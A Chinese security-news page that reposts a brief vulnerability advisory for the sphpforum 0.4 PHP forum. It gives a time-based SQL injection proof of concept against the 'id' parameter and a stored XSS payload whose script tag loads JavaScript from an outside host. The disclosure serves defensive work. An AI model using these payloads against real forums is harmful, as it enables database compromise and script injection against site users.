当前位置:首页 >> 网络通讯 >> 网络安全 >> 内容

sphpforum 0.4多个缺陷及修复

时间:2013/4/19 12:09:00 作者:平凡之路 来源:xuhantao.com 浏览:

作者: loneferret of Offensive Security 
 
影响产品: sphpforum 
 
影响版本: 0.4 (older versions may be affected) 
 
下载地址:  
 
程序概述 
 
# Simple PHP Forum is a PHP based forum/BBS board is designed to be small, simple,  
 
# fast and allow easy integration into any existing web site. 
 
  
 
缺陷分析: 
 
# Due to improper input sanitation, parameters are prone to SQL injection. Stored 
 
# crossed site scripting is also present in some forms. 
 
  
 
# PoC 1: 
 
# SQL Injection 
 
# Page: view_topic.php / view_profile.php? 
 
缺陷参数  'id' 
 
# /sphpforum/sphpforum-0.4/view_topic.php?id=50%27%20and%20sleep%2810%29%20and%20%271%27=%271 
 
# ?id=loneferret%27%20and%20sleep%2810%29%20and%20%271%27=%271 
 
  
 
# PoC 2: 
 
#存储型 XSS 
 
# Page: create_topic.php 
 
# Vulnerable field: Topic 
 
# Payload: <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
 

,涛涛电脑知识网,涛涛电脑知识网

相关文章
  • 没有相关文章
  • 徐汉涛(www.xuhantao.com) © 2024 版权所有 All Rights Reserved.
  • 部分内容来自网络,如有侵权请联系站长尽快处理 站长QQ:965898558(广告及站内业务受理) 网站备案号:蒙ICP备15000590号-1